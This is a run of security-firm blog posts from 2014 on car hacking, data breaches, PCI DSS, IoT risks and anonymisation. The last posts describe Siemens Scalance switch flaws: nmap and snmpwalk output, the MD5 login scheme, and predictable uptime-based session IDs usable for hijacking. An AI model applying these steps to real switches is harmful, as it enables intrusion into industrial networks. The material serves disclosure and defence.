INSIGHTS | April 8, 2014

Car Hacking 2: The Content

Does everyone remember when those two handsome young gentlemen controlled automobiles with CAN message injection (https://www.youtube.com/watch?v=oqe6S6m73Zw)? I sure do. However, what if you don’t have the resources to purchase a car, pay for insurance, repairs to the car, and so on? 
 
Fear not Internet! 
 
Chris and Charlie to the rescue. Last week we presented our new automotive research at Syscan 2014. To make a long story short, we provided the blueprints to setup a small automotive network outside the vehicle so security researchers could start investigating Autosec (TM pending) without requiring the large budget needed to procure a real automobile. (Update: Andy Greenberg just released an article explaining our work, http://www.forbes.com/sites/andygreenberg/2014/04/08/darpa-funded-researchers-help-you-learn-to-hack-a-car-for-a-tenth-the-price/)
 
 
Additionally, we provided a solution for a mobile testing platform (a go-cart) that can be fashioned with ECUs from a vehicle (or purchased on Ebay) for testing that requires locomotion, such as assisted braking and lane departure systems. 
 
 
For those of you that want the gritty technical details, download this paper. As always, we’d love feedback and welcome any questions. 
 

 

INSIGHTS | March 26, 2014

A Bigger Stick To Reduce Data Breaches

On average I receive a postal letter from a bank or retailer every two months telling me that I’ve become the unfortunate victim of a data theft or that my credit card is being re-issued to prevent against future fraud. When I quiz my friends and colleagues on the topic, it would seem that they too suffer the same fate on a reoccurring schedule. It may not be that surprising to some folks. 2013 saw over 822 million private records exposed according to the folks over at DatalossDB – and that’s just the ones that were disclosed publicly.

It’s clear to me that something is broken and it’s only getting worse. When it comes to the collection of personal data, too many organizations have a finger in the pie and are ill equipped (or prepared) to protect it. In fact I’d question why they’re collecting it in the first place. All too often these organizations – of which I’m supposedly a customer – are collecting personal data about “my experience” doing business with them and are hoping to figure out how to use it to their profit (effectively turning me in to a product). If these corporations were some bloke visiting a psychologist, they’d be diagnosed with a hoarding disorder. For example, consider what criteria the DSM-5 diagnostic manual uses to identify the disorder:

  • Persistent difficulty discarding or parting with possessions, regardless of the value others may attribute to these possessions.
  • This difficulty is due to strong urges to save items and/or distress associated with discarding.
  • The symptoms result in the accumulation of a large number of possessions that fill up and clutter active living areas of the home or workplace to the extent that their intended use is no longer possible.
  • The symptoms cause clinically significant distress or impairment in social, occupational, or other important areas of functioning.
  • The hoarding symptoms are not due to a general medical condition.
  • The hoarding symptoms are not restricted to the symptoms of another mental disorder.

Whether or not the organizations hording personal data know how to profit from it or not, it’s clear that even the biggest of them are increasingly inept at protecting it. The criminals that are pilfering the data certainly know what they’re doing. The gray market for identity laundering has expanded phenomenonly since I talked about at Blackhat in 2010.

We can moan all we like about the state of the situation now, but we’ll be crying in the not too distant future when statistically we progress from being a victim to data loss, to being a victim of (unrecoverable) fraud.

The way I see it, there are two core components to dealing with the spiraling problem of data breaches and the disclosure of personal information. We must deal with the “what data are you collecting and why?” questions, and incentivize corporations to take much more care protecting the personal data they’ve been entrusted with.

I feel that the data hording problem can be dealt with fairly easily. At the end of the day it’s about transparency and the ability to “opt out”. If I was to choose a role model for making a sizable fraction of this threat go away, I’d look to the basic component of the UK’s Data Protection Act as being the cornerstone of a solution – especially here in the US. I believe the key components of personal data collection should encompass the following:

  • Any organization that wants to collect personal data must have a clearly identified “Data Protection Officer” who not only is a member of the executive board, but is personally responsible for any legal consequences of personal data abuse or data breaches.
  • Before data can be collected, the details of the data sought for collection, how that data is to be used, how long it would be retained, and who it is going to be used by, must be submitted for review to a government or legal authority. I.e. some third-party entity capable of saying this is acceptable use – a bit like the ethics boards used for medical research etc.
  • The specifics of what data a corporation collects and what they use that data for must be publicly visible. Something similar to the nutrition labels found on packaged foods would likely be appropriate – so the end consumer can rapidly discern how their private data is being used.
  • Any data being acquired must include a date of when it will be automatically deleted and removed.
  • At any time any person can request a copy of any and all personal data held by a company about themselves.
  • At any time any person can request the immediate deletion and removal of all data held by a company about themselves.

If such governance existed for the collection and use of personal data, then the remaining big item is enforcement. You’d hope that the morality and ethics of corporations would be enough to ensure they protected the data entrusted to them with the vigor necessary to fight off the vast majority of hackers and organized crime, but this is the real world. Apparently the “big stick” approach needs to be reinforced.

A few months ago I delved in to how the fines being levied against organizations that had been remiss in doing all they could to protect their customer’s personal data should be bigger and divvied up. Essentially I’d argue that half of the fine should be pumped back in to the breached organization and used for increasing their security posture.

Looking at the fines being imposed upon the larger organizations (that could have easily invested more in protecting their customers data prior to their breaches), the amounts are laughable. No noticeable financial pain occurs, so why should we be surprised if (and when) it happens again. I’ve become a firm believer that the fines businesses incur should be based upon a percentage of valuation. Why should a twenty-billion-dollar business face the same fine for losing 200,000,000 personal records as a ten-million-dollar business does for losing 50,000 personal records? If the fine was something like two-percent of valuation, I can tell you that the leadership of both companies would focus more firmly on the task of keeping yours and mine data much safer than they do today. 

INSIGHTS | February 27, 2014

Beware Your RSA Mobile App Download

It’s been half a decade since Apple launched their iPhone campaign titled “There’s an app for that“. In the years following, the mobile app stores (from all the major players) have continued to blossom to the point that not only are there several thousand apps that help light your way (i.e. by keeping the flash running bright), but every company, cause, group, or notable event is expected to publish their own mobile application. 
 
Today there are several hundred good “rapid development” kits that allow any newbie to craft and release their own mobile application and several thousand small professional software development teams that will create one on your behalf. These bespoke mobile applications aren’t the types products that their owners are expecting to make much (if any) money off of. Instead, these apps are generally helpful tools that appeal to a particular target audience.
 
Now, while the cynical side of me would like to point out that some people should never be trusted with tools as lofty as HTML and setting up WordPress sites–let alone building a mobile app, many corporate marketing teams I’ve dealt with have not only drunk the “There’s an app for that” Kool-Aid, they appear to bath in the stuff each night. As such, a turnkey approach to app production is destined to involve many sacrifices and, at the top of the sacrificial pillar, data security and integrity continue to reign supreme.
 
A few weeks ago I noticed that, in the run up to the RSA USA 2014 conference, a new mobile application was conceived and thrust upon the Apple and Google app stores and electronically marketed to the world at large. Maybe it was a reaction to being spammed with a never-ending tirade of “come see us at RSA” emails, or it was topical off the back of a recent blog on the state of mobile banking application security, or maybe both. I asked some of the IOActive consulting team who had a little bench-time between jobs to have a poke at freshly minted “RSA Conference 2014” mobile application. 
 
 
 
The Google Play app store describes the RSA Conference 2014 application like this:
With the RSA Conference Mobile App, you can stay connected with all Conference activities, view the event catalog, manage session schedules and engage with colleagues and peers while onsite using our social and professional networking tools. You’ll have access to dynamic agenda updates, venue maps, exhibitor listing and more!
Now, I wasn’t expecting the application to be particularly interesting–it’s not as if it was a transactional banking application etc.–but I would have thought that RSA (or whoever they tasked with commissioning the application) would have at least applied some basic elbow grease so as to not potentially embarrass themselves. Alas, that was not to be the case.
 
The team came back rather quickly with a half-dozen security issues. Technically the highest impact vulnerability had to do with the app being vulnerable to man-in-the-middle attacks, where an attacker could inject additional code into the login sequence and phish credentials. If we were dealing with a banking application, then heads would have been rolling in an engineering department, but this particular app has only been downloaded a few thousand times, and I seriously doubt that some evil hacker is going to take the time out of their day to target this one application (out of tens-of-millions) to try phish credentials to a conference.
 
It was the second most severe vulnerability that caught my eye though. The RSA Conference 2014 application downloads a SQLite DB file that is used to populate the visual portions of the app (such as schedules and speaker information) but, for some bizarre reason, it also contains information of every registered user of the application–including their name, surname, title, employer, and nationality.
 
 
 
I have no idea why the app developers chose to do that, but I’m pretty sure that the folks who downloaded and installed the application are unlikely to have thought that their details were being made public and published in this way. Marketers love this kind of information though!
 
Some readers may think I’m targeting RSA, and in a small way I guess I am. Security flaws in mobile applications (particularly these rapidly developed and targeted apps) are endemic, and I think the RSA example helps prove the point that there are often inherent risks in even the most benign applications.
 
I’m betting that RSA didn’t even create the application themselves. The Google Play store indicates that a company called QuickMobile was the developer. With one small click it’s possible to get a list of all the other applications QuickMobile have created for what I would assume to be on their clients behalf.
 
 
 
As you can see from above, there are lots of popular brands and industry conferences employing their app creation services. I wonder if many of them share the same vulnerabilities as the RSA Conference 2014 application?
 
Here’s a little bit of advice to any corporate marketing team. If you’re going to release your own mobile application, the security and integrity of that application are your responsibility. While you can’t outsource that, you can get another organization to assess the application on your behalf.
 
In the meantime, readers of this blog may want to refrain from downloading the RSA Conference 2014 (and related) mobile applications–unless you’re a hacker or marketing team that wants to acquire a free list of conference attendees names, positions, and employers.
INSIGHTS | February 19, 2014

PCI DSS and Security Breaches

Every time an organization suffers a security breach and cardholder data is compromised, people question the effectiveness of the Payment Card Industry Data Security Standard (PCI DSS). Blaming PCI DSS for the handful of companies that are breached every year shows a lack of understanding of the standard’s role. 
Two major misconceptions are responsible for this.
 
First, PCI DSS is a compliance standard. An organization can be compliant today and not tomorrow. It can be compliant when an assessment is taking place and noncompliant the minute the assessment is completed.
Unfortunately, some organizations don’t see PCI DSS as a standard that applies to their day-to-day operations; they think of it as a single event that they must pass at all costs. Each year, they desperately prepare for their assessment and struggle to remediate the assessor’s findings before their annual deadline. When they finally receive their attestation, they check out and don’t think about PCI DSS compliance until next year, when the whole process starts again. 
 
Their information security management system is immature, ad-hoc, perhaps even chaotic, and driven by the threat of losing a certificate or being fined by their processor.
 
To use an analogy, PCI DSS compliance is not a race to a destination, but how consistently well you drive to that destination. Many organizations accelerate from zero to sixty in seconds, braking abruptly, and starting all over again a month later. The number of security breaches will be reduced as soon as organizations and assessors both understand that a successful compliance program is not a single state, but an ongoing process. As such, an organization that has a mature and repeatable process will be compliant continuously with rare exceptions and not only during the time of the assessment.
 
Second, in the age of Advanced Persistent Threats (APTs), the challenge for most organizations it is not whether they can successfully prevent an attack from ever occurring, but how quickly they can become aware that a breach has actually occurred.
 
PCI DSS requirements can be classified into three categories:  
 
1. Requirements intended to prevent an incident from happening in the first place. 
These requirements include implementing network access controls, configuring systems securely, applying periodic security updates, performing periodic security reviews, developing secure applications, providing security awareness to the staff, and so on. 
 

2. Requirements designed to detect malicious activities.
These requirements involve implementing solutions such as antivirus software, intrusion detection systems, and file integrity monitoring.


3. Requirements designed to ensure that if a security breach occurs, actions are taken to respond to and contain the security breach, and ensure evidence will exist to identify and prosecute the attackers.

 
Too many organizations focus their compliance resources on the first group of requirements. They give the second and third groups as little attention as possible. 
 
This is painfully obvious. According to the Verizon Data Breach Investigation Report (DBIR) and public information available for the most recent company breaches, most organizations become aware of a security breach many weeks or even months after the initial compromise, and only when notified by the payment card brands or law enforcement. This confirms a clear reality. Breached organizations do not have the proper tools and/or qualified staff to monitor their security events and logs. 
 
Once all the preventive and detective security controls required by PCI DSS have been properly implemented, the only thing left for an organization is to thoroughly monitor logs and events. The goal is to detect anomalies and take any necessary actions as soon as possible.
 
Having sharp individuals in this role is critical for any organization. The smarter the individuals doing the monitoring are, the less opportunity attackers have to get to your data before they are discovered. 
 
You cannot avoid getting hacked. Sooner or later, to a greater or lesser degree, it will happen. What you can really do is monitor and investigate continuously.
 

 

In PCI DSS compliance, monitoring is where companies are really failing.
INSIGHTS | February 17, 2014

INTERNET-of-THREATS

At IOActive Labs, I have the privilege of being part of a great team with some of the world’s best hackers. I also have access to really cool research on different technologies that uncovers security problems affecting widely used hardware and software. This gives me a solid understanding of the state of security for many different software and hardware devices, not just opinions based on theories and real life experience.
 
Currently, the term Internet-of-Things (IoT) is becoming a buzzword used in the media, announcements from hardware device manufacturers, etc. Basically, it’s used to describe an Internet with everything connected to it. It describes what we are seeing nowadays, including:
  • Laptops, tablets, smartphones, set-top boxes, media-streaming devices, and data-storage devices
  • Watches, glasses, and clothes
  • Home appliances, home switches, home alarm systems, home cameras, and light bulbs
  • Industrial devices and industrial control systems
  • Cars, buses, trains, planes, and ships
  • Medical devices and health systems
  • Traffic sensors, seismic sensors, pollution sensors, and weather sensors
     …and more; you name it, and it is or soon will be connected to the Internet.
 
While the devices and systems connected to the Internet are different, they have something in common–most of them suffer from serious security vulnerabilities. This is not a guess. It is based on IOActive Labs’ security research into many of these types of devices currently being used worldwide. Sadly, we are seeing almost the exact same vulnerabilities on these devices that have plagued software vendors over the last decade. Vulnerabilities that the most important software vendors are trying hard to eradicate. It seems that many hardware companies are following really poor security practices when adding software to their products and connecting them to the Internet. What is worse is that sometimes vendors don’t even respond to security vulnerability reports or just downplay the threat and don’t fix the vulnerabilities. Many vendors don’t even know how to properly deal with the security vulnerabilities being reported.
 
Some of common vulnerabilities IOActive Labs finds include:
  • Sensitive data sent over insecure channels
  • Improper use of encryption
    • No SSL certificate validation
    • Things like encryption keys and signing certificates easily available to anyone
  • Hardcoded credentials/backdoor accounts
  • Lack of authentication and/or authorization
  • Storage of sensitive data in clear text
  • Unauthenticated and/or unauthorized firmware updates
  • Lack of firmware integrity check during updates
  • Use of insecure custom made protocols
Also, data ambition is working against vendors and is increasing attack surfaces considerably. For example, all data collected is sent to “vendor cloud” and device commands are sent from “vendor cloud”, instead of just allowing users to connect directly to and command their devices. Hacking into “vendor cloud” = thousands of devices compromised = lots of lost money.
 
Why should we worry about all of this? Well, these devices affect our everyday life and will continue to do so more and more. We’ve only seen the tip of the iceberg when it comes to the attacks that people, companies, and governments face and how easily they can be performed. If the situation doesn’t change soon, it is just matter of time before we witness attacks with tragic consequences.
 
If a headline like “+100K Digital Toilets from XYZ1.3 Inc. Found Sending Spam and Distributing Malware” doesn’t scare you because you think it’s funny and improbable, you could be wrong. We shouldn’t wait for headlines such as “Dozens of People Injured When Home Automation Devices Hacked” before we react.
 
Something must be done! From enforcing secure practices during product development to imposing high fines when products are hacked, action must be taken to prevent the loss of money and possibly even lives.
 
Companies should strongly consider:
    • Training developers on secure development
    • Implementing security development practices to improve software security
    • Training company staff on security best practices
    • Implementing a security patch development and distribution process
    • Performing product design/architecture security reviews
    • Performing source code security audits
    • Performing product penetration tests
    • Performing company network penetration tests
    • Staying up-to-date with new security threats
    • Creating a bug bounty program to reward reported vulnerabilities and clearly defining how vulnerabilities should be reported
    • Implementing a security incident/emergency response team
It is difficult to give advice to end users given that the best solution is just not to buy or use many products because they are insecure by design. At this stage, it’s just matter of being lucky and hoping that you won’t be hacked. Maybe opportunistic vendors could come up with some novel solution such as an IPS/anti* device that will protect all of your devices from attacks. Just pray that the protection device itself is not vulnerable.
 
Sometimes end users are forced to live with insecure devices since there isn’t any way to turn them off or not to use them. These include devices provided by TV cable companies, electricity and gas companies, public services companies, governments, etc. These companies and the government should take responsibility for deploying secure products.
 
This is not BS–in a couple of days we will be releasing some of the extensive research I mentioned and on which this blog post is based.
 
I intend for this post to be a wakeup call for everyone! I’m really concerned about the current situation. In the meantime, I will use the term INTERNET-of-THREATS (not Internet-of-Things). Maybe this new buzzword will make us more conscious of the situation. If it doesn’t, then at least I have tried.
INSIGHTS | February 14, 2014

The password is irrelevant too

In this follow up to a blog post on the Scalance-X200 series switches, we look at an authentication bypass vulnerability. It isn’t particularly complicated, but it does allow us to download configuration files, log files, and a firmware image. It can also be used to upload configuration and firmware images, which causes the device to reboot.
 
The code can be found in IOActive Labs github repository.
 
If an attacker has access to a configuration file with a known password, they can use this code to update the configuration file and take over the switch’s management functions. It can also be used to mirror ports and enable or disable other services, such as telnet, SSH, or SNMP. Lastly, the same script can be used to upload a firmware image to the device sans authentication. In other words, it is *delightfully reprogrammable* until you install the patch.
 
 
This brings us to an interesting point. I asked Siemens if the SSH keys in Firmware V5.X (the fixed version) are unique per device, and I was assured that they are. If this is true, there should be no problem with me publishing a hash of the private key for my device. Don’t worry damsels and chaps, I can always patch my device with a new key later, as a demonstration of my enthusiasm for firmware. 
 
Anyway, here are two fingerprints of the private SSH key: 
 
MD5   6f09a4d77569236fd90483a85920912d
SHA256    505166f90ee05761b11a5feda24d0ccdc53ef902cdd617b330db3634cc2788f7
 
If you have one of these devices and have patched to the version that contains fixes, you could assist the community greatly by verifying that the key gets a different finger-print. This will independently confirm what those outstanding gentry at Siemens told me and promote confidence in their security solutions.
 
This neatly segues into some changes we’ve seen in the ICS-space over the last few years. 
 
The primary change in behavior I’d like to applaud is how companies are striving to develop better relationships with independent security researchers such as myself. The increase in constructive dialogue is evidenced by Siemen’s ability to receive notification and then produce a patch within three months. Years ago we were regularly waiting six months to two years for fixes.
 
In fact, I challenged vendors at S4x14 to commit to an AVERAGE TIME of security patching for externally supplied vulnerabilities. We purposefully chose the average time for this challenge, because we know that providing quality assurance for these systems is difficult and can be time consuming. After all, some bugs are just thornier than others
 
Incidentally, this is backed up by empirical research shared with me by the inimitable Sean McBride during our conversations at S4x14. I wouldn’t want you to think I am just some un-gentlemanly shuffler or simkin, challenging hecatonchires for the sport of it (hat-tip @sergeybratus).
 
Follow @digitalbond to see the response I got to committing to an average security patch time, when my ”Red/Blue Live” talk goes online. You’ll also notice that my two attackers (red team) did not manage to use the script to take over the device, despite doing so in practice sessions the night before. The ingenious Rotem Bar (blue team) demonstrated that the secret of ICS security is to simply *patch*. Apparently, it is not only possible, but effective!
…and btw, happy Valentine’s!
INSIGHTS | February 6, 2014

An Equity Investor’s Due Diligence

Information technology companies constitute the core of many investment portfolios nowadays. With so many new startups popping up and some highly visible IPO’s and acquisitions by public companies egging things on, many investors are clamoring for a piece of the action and looking for new ways to rapidly qualify or disqualify an investment ; particularly so when it comes to hottest of hot investment areas – information security companies. 

Over the years I’ve found myself working with a number of private equity investment firms – helping them to review the technical merits and implications of products being brought to the market by new security startups. In most case’s it’s not until the B or C investment rounds that the money being sought by the fledgling company starts to get serious to the investors I know. If you’re going to be handing over money in the five to twenty million dollar range, you’re going to want to do your homework on both the company and the product opportunity. 

Over the last few years I’ve noted that a sizable number of private equity investment firms have built in to their portfolio review the kind of technical due diligence traditionally associated with the formal acquisition processes of Fortune-500 technology companies. It would seem to me that the $20,000 to $50,000 price tag for a quick-turnaround technical due diligence report is proving to be valuable investment in a somewhat larger investment strategy. 

When it comes to performing the technical due diligence on a startup (whether it’s a security or social media company for example), the process tends to require a mix of technical review and tapping past experiences if it’s to be useful, let alone actionable, to the potential investor. Here are some of the due diligence phases I recommend, and why:

    1. Vocabulary Distillation – For some peculiar reason new companies go out of their way to invent their own vocabulary as descriptors of their value proposition, or they go to great lengths to disguise the underlying processes of their technology with what can best be described as word-soup. For example, a “next-generation big-data derived heuristic determination engine” can more than adequately be summed up as “signature-based detection”. Apparently using the word “signature” in your technology description is frowned upon and the product management folks avoid the use the word (however applicable it may be). Distilling the word soup is a key component of being able to compare apples with apples.
    1. Overlapping Technology Review – Everyone wants to portray their technology as unique, ground-breaking, or next generation. Unfortunately, when it comes to the world of security, next year’s technology is almost certainly a progression of the last decade’s worth of invention. This isn’t necessarily bad, but it is important to determine the DNA and hereditary path of the “new” technology (and subcomponents of the product the start-up is bringing to market). Being able to filter through the word-soup of the first phase and determine whether the start-up’s approach duplicates functionality from IDS, AV, DLP, NAC, etc. is critical. I’ve found that many start-ups position their technology (i.e. advancements) against antiquated and idealized versions of these prior technologies. For example, simplifying desktop antivirus products down to signature engines – while neglecting things such as heuristic engines, local-host virtualized sandboxes, and dynamic cloud analysis.
    1. Code Language Review – It’s important to look at the languages that have been employed by the company in the development of their product. Popular rapid prototyping technologies like Ruby on Rails or Python are likely acceptable for back-end systems (as employed within a private cloud), but are potential deal killers to future acquirer companies that’ll want to integrate the technology with their own existing product portfolio (i.e. they’re not going to want to rewrite the product). Similarly, a C or C++ implementation may not offer the flexibility needed for rapid evolution or integration in to scalable public cloud platforms. Knowing which development technology has been used where and for what purpose can rapidly qualify or disqualify the strength of the company’s product management and engineering teams – and help orientate an investor on future acquisition or IPO paths.
    1. Security Code Review – Depending upon the size of the application and the due diligence period allowed, a partial code review can yield insight in to a number of increasingly critical areas – such as the stability and scalability of the code base (and consequently the maturity of the development processes and engineering team), the number and nature of vulnerabilities (i.e. security flaws that could derail the company publicly), and the effort required to integrate the product or proprietary technology with existing major platforms.
    1. Does it do what it says on the tin? – I hate to say it, but there’s a lot of snake oil being peddled nowadays. This is especially so for new enterprise protection technologies. In a nut-shell, this phase focuses on the claims being made by the marketing literature and product management teams, and tests both the viability and technical merits of each of them. Test harnesses are usually created to monitor how well the technology performs in the face of real threats – ranging from the samples provided by the companies user acceptance team (UAT) (i.e. the stuff they guarantee they can do), through to common hacking tools and tactics, and on to a skilled adversary with key domain knowledge.
  1. Product Penetration Test – Conducting a detailed penetration test against the start-up’s technology, product, or service delivery platform is always thoroughly recommended. These tests tend to unveil important information about the lifecycle-maturity of the product and the potential exposure to negative media attention due to exploitable flaws. This is particularly important to consumer-focused products and services because they are the most likely to be uncovered and exposed by external security researchers and hackers, and any public exploitation can easily set-back the start-up a year or more in brand equity alone. For enterprise products (e.g. appliances and cloud services) the hacker threat is different; the focus should be more upon what vulnerabilities could be introduced in to the customers environment and how much effort would be required to re-engineer the product to meet security standards.


Obviously there’s a lot of variety in the technical capabilities of the various private equity investment firms (and private investors). Some have people capable of sifting through the marketing hype and can discern the actual intellectual property powering the start-ups technology – but many do not. Regardless, in working with these investment firms and performing the technical due diligence on their potential investments, I’ve yet to encounter a situation where they didn’t “win” in some way or other. A particular favorite of mine is when, following a code review and penetration test that unveiled numerous serious vulnerabilities, the private equity firm was still intent on investing with the start-up but was able use the report to negotiate much better buy-in terms with the existing investors – gaining a larger percentage of the start-up for the same amount.

INSIGHTS | January 21, 2014

Scientifically Protecting Data

This is not “yet another Snapchat Pwnage blog post”, nor do I want to focus on discussions about the advantages and disadvantages of vulnerability disclosure. A vulnerability has been made public, and somebody has abused it by publishing 4.6 million records. Tough luck! Maybe the most interesting article in the whole Snapchat debacle was the one published at www.diyevil.com [1], which explains how data correlation can yield interesting results in targeted attacks. The question then becomes, “How can I protect against this?”

Stored personal data is always vulnerable to attackers who can track it down to its original owner. Because skilled attackers can sometimes gain access to metadata, there is very little you can do to protect your data aside from not storing it at all. Anonymity and privacy are not new concepts. Industries, such as healthcare, have used these concepts for decades, if not centuries. For the healthcare industry, protecting patient data remains one of the most challenging problems. Where does the balance tip when protecting privacy by not disclosing that person X is a diabetic, and protecting health by giving EMT’s information about allergies and existing conditions? It’s no surprise that those who research data anonymity and privacy often use healthcare information for their test cases. In this blog, I want to focus on two key principles relating to this.

k-Anonymity [2] 
In 2000, Latanya Sweeney used the US Census data to prove that 87% of US citizens are uniquely identifiable by their birth date, gender, and zip code[3]. That isn’t surprising from a mathematical point of view as there are approximately 310 million Americans and roughly 2 billion possible combinations of the {birth date,gender, zip code} tuple. You can easily find out how unique you really are through an online application using the latest US Census data [4] Although it is not a good idea to store “unique identifiers” like names, usernames, or social security numbers, this is not at all practical. Assuming that data storage is a requirement, k-Anonymity comes into play. By using data suppression, where data is replaced by an *, and data generalization, where—as an example—a specific age is replaced by an age range, companies can anonymize a data set to a level where each row is, at the very least, identical to k-1 rows in the dataset. Whoever thought an anonymity level could actually be mathematically proven?

k-Anonymity has known weaknesses. Imagine that you know that the data of your Person of Interest (POI) is among four possible records in four anonymous datasets. If these four records have a common trait like “disease = diabetes”, you know that your POI suffers from this disease without knowing the record in which their data is contained. With sufficient metadata about the POI, another concept comes into play. Coincidentally, this is also where we find a possible solution for preventing correlation attacks against breached databases.

l-diversity [5] 
One thing companies cannot control is how much knowledge about a POI an adversary has. This does not, however, divorce us from our responsibility to protect user data. This is where l-Diversity comes into play. This concept does not focus on the fields that attackers can use to identify a person with available data. Instead, it focuses on sensitive information in the dataset. By applying the l-Diversity principle to a dataset, companies can make it notably expensive for attackers to correlate information by increasing the number of required data points.

Solving Problems 
All of this sounds very academic, and the question remains whether or not we can apply this in real-life scenarios to better protect user data. In my opinion, we definitely can.

Social application developers should become familiar with the principles of k-Anonymity and l-Diversity. It’s also a good idea to build KPIs that can be measured against. If personal data is involved, organizations should agree on minimum values for k and l.

More and more applications allow user email addresses to be the same as the associated user name. This directly impacts the l-Diversity database score. Organizations should allow users to select their username and also allow the auto-generation of usernames. Both these tactics have drawbacks, but from a security point of view, they make sense.

Users should have some control. This becomes clear when analyzing the common data points that every application requires.

  • Email address:
    • Do not use your corporate email address for online services, unless it is absolutely necessary
    • If you have multiple email addresses, randomize the email addresses that you use for registration
    • If your email provider allows you to append random strings to your email address, such as name+random@gmail.com, use this randomization—especially if your email address is also your username for this service
  • Username:
    • If you can select your username, make it unique
    • If your email address is also your username, see my previous comments on this
  • Password:
    • Select a unique password for each service
    • In some cases, select a phone number for 2FA or other purposes

By understanding the concepts of k-Anonymity and l-Diversity, we now know that this statement in the www.diyevil.com article is incorrect:

“While the techniques described above depend on a bit of luck and may be of limited usefulness, they are yet another tool in the pen tester’s toolset for open source intelligence gathering and user attack vectors.”

The success of techniques discussed in this blog depend on science and math. Also, where science and math are in play, solutions can be devised. I can only hope that the troves of “data scientists” that are currently being recruited also understand the principles I have described. I also hope that we will eventually evolve into a world where not only big data matters but where anonymity and privacy are no longer empty words.

[1] http://www.diyevil.com/using-snapchat-to-compromise-users/
[2] https://ioactive.com/wp-content/uploads/2014/01/K-Anonymity.pdf
[3] https://ioactive.com/wp-content/uploads/2014/01/paper1.pdf
[4] http://aboutmyinfo.org/index.html
[5] https://ioactive.com/wp-content/uploads/2014/01/ldiversityTKDDdraft.pdf

INSIGHTS | January 13, 2014

The password is irrelevant

This story begins with a few merry and good hearted tweets from S4x13. These tweets in fact:
 
 
Notice the shared conviviality, and the jolly manner in which this discussion of vulnerabilities occurs.
 
It is with this same lightness in my heart that I thought I would explore the mysterious world of the.

 
So I waxed my moustache, rolled up my sleeves, and began to use the arcane powers of Quality Assurance. 
 
Ok, how would an attacker who doesn’t have default credentials or a device to test on go about investigating one of these remotely? Why, find one on Shodan of course!
 
 
Personally, I buy mine second hand from eBay with the fortune I inherited from my grandfather’s moustache wax empire.
 
The first thing an attacker would normally do is scan the device to get familiar with the ports and services. A quick nmap looks like this:
 
Nmap scan report for Unknown (192.168.0.5)
Host is up (0.0043s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 4.2 (protocol 2.0)
|_ssh-hostkey: 1024 cd:b4:33:49:62:3b:58:1a:67:5a:a3:f0:50:00:71:86 (RSA)
23/tcp  open  telnet?
80/tcp  open  http     WindWeb 4.00
|_http-methods: No Allow or Public header in OPTIONS response (status
code 501)
|_http-title: Logon to SCALANCE X Management (192.168.0.5)
84/tcp  open  ctf?
111/tcp open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|_  100000  2            111/udp  rpcbind
443/tcp open  ssl/http WindWeb 4.00
|_http-methods: No Allow or Public header in OPTIONS response (status
code 501)
|_http-title: Logon to SCALANCE X Management (192.168.0.5)
| ssl-cert: Subject: organizationName=Siemens
AG/stateOrProvinceName=BW/countryName=DE
| Not valid before: 2008-02-04T14:05:57+00:00
|_Not valid after:  2038-01-18T14:05:57+00:00
|_ssl-date: 1970-01-01T00:14:20+00:00; -43y254d14h08m05s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
MAC Address: 00:0E:8C:A3:4E:CF (Siemens AG A&D ET)
Device type: general purpose
Running: Wind River VxWorks
OS CPE: cpe:/o:windriver:vxworks
OS details: VxWorks
Network Distance: 1 hop
 
So we have a variety of management interfaces to choose from: Telnet (really in 2014?!?), SSH, HTTP, and HTTPS. All of these interfaces share the same users and default passwords you would expect, but we are looking for something more meaningful. 
 
Now that we’ve found them on Shodan (wait, they’re all air-gapped, right?), we quickly learn from the web interface that there are only two users: admin and user. Next we view the web page source and search for “password” which gives us this lovely snippet:
 
document.submitForm.encoded.value = document.logonForm.username.value + “:” + md5(document.logonForm.username.value + “:” + document.logonForm.password.value + “:” + document.submitForm.nonceA.value)
 
 
This is equivalent to the following command on Linux:
 
echo -n “admin:admin:C0A8006500005F31” | md5sum
 
 
Which is then posted to the device in a form such as this (although this one has a different password*):
 
encoded=admin%3Aafc0dc177659c8e9d72dec8a3c68650e&nonceA=C0A800610000CE29
 
Setting aside just how weak the use of MD5 is (and in fact I have written a script to brute-force credentials snatched off the wire), that nonceA value is very important. A nonce is a ‘number used once’, which is typically used to prevent cryptographic replay attacks. In other words, this random challenge value is provided by the server, to keep an attacker from simply capturing the hash on the wire and replaying it to the server later when they want to login. This nonce then, deserves our attention.
 
It appears that this is an ID field in the cookie, and that it is also the session ID. If I can predict session Ids, I can perform session hijacking while someone is managing the switch. So we set about estimating the entropy of this session ID, which initially appears to be 16 hex values. However, we won’t even need to create an equation since it turns out to be COMPLETELY predictable, as you will soon see. 
 
We can use WGET to fetch the page a few times and get a small sample of these nonceA values. This is what we see:
 
C0A8006500005F31,C0A8006500001A21,C0A8006500000960,C0A80065000049A6
 
This seems distinctly non-random. In fact, when I measured it more precisely, it became clear that it was sequential! A little further investigation revealed that SNMP is sometimes available to us. So we use snmpwalk on one of the devices I have at home:
 
snmpwalk -Os -c public -v 1 192.168.0.5
iso.3.6.1.2.1.1.1.0 = STRING: “Siemens, SIMATIC NET, SCALANCE X204-2,
6GK5 204-2BB10-2AA3, HW: 4, FW: V4.03″
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.4196.1.1.5.2.22
iso.3.6.1.2.1.1.3.0 = Timeticks: (471614) 1:18:36.14
 
Well look at that! 
 
47164 in base 10 = 7323E in hex! I wonder if the session ID is simply uptime in hex?
 
We do a WGET at approximately the same time and get this as a session ID:
 
C0A800610007323F
 
So if we assume the last 8 hex chars are uptime in hex (or at least close enough for us to brute-force the few values around it), then where do the first 8 hex come from? 
 
I initially imagined they were unique for each device and set out to test that theory by getting a session ID from another device found on Shodan. Keep in mind I did not attempt a login, I just fetched the page to see what the session ID was. Sure enough it was different, but the one from the switch I have wasn’t the MAC address or any other unique identifier on the switch. I spent a week missing the point here, but luckily I have excellent company at IOActive Labs. 
 
